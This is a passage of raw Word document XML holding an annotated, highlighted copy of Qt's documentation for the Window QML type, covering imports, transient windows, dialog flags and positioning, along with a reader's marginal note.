            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qml</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>window</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>window</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00BE3BBD" w:rsidRDefault="00C72653" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1315" w:name="_Toc483000808"/>
      <w:bookmarkStart w:id="1316" w:name="_Toc483003806"/>
      <w:bookmarkStart w:id="1317" w:name="_Toc483604158"/>
      <w:bookmarkStart w:id="1318" w:name="_Toc483605378"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Window QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1315"/>
      <w:bookmarkEnd w:id="1316"/>
      <w:bookmarkEnd w:id="1317"/>
      <w:bookmarkEnd w:id="1318"/>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Window object creates a new top-level window for a Qt Quick scene</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically sets up the window for use with</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick 2.x</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>graphical types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use this type, you will need to </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1602" w:history="1">
        <w:r w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Window </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Omitting this import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will allow you to have a QML environment without access to window system features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="001B046D" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A Window </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be declared inside an Item or inside another Window</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; in that case the inner Window will automatically become </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"transient for</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" the outer Window: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, most platforms will show it centered upon the outer window by default, and there may be other platform-dependent behaviors, depending also on the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1603" w:anchor="flags-prop" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>flags</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If the nested window is intended to be a dialog in your application, you should also set</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1604" w:anchor="flags-prop" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>flags</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to Qt.Dialog</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> some window managers will not provide the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>centering behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without that flag. You can also </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declare multiple windows inside a top-level</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1605" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, in which case the windows will have </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no transient relationship</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu about transient relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can set or bind</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1606" w:anchor="x-prop" w:history="1">
        <w:r w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1607" w:anchor="y-prop" w:history="1">
        <w:r w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Window </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D143AF" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the user attempts to close a window, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1608" w:anchor="closing-signal" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
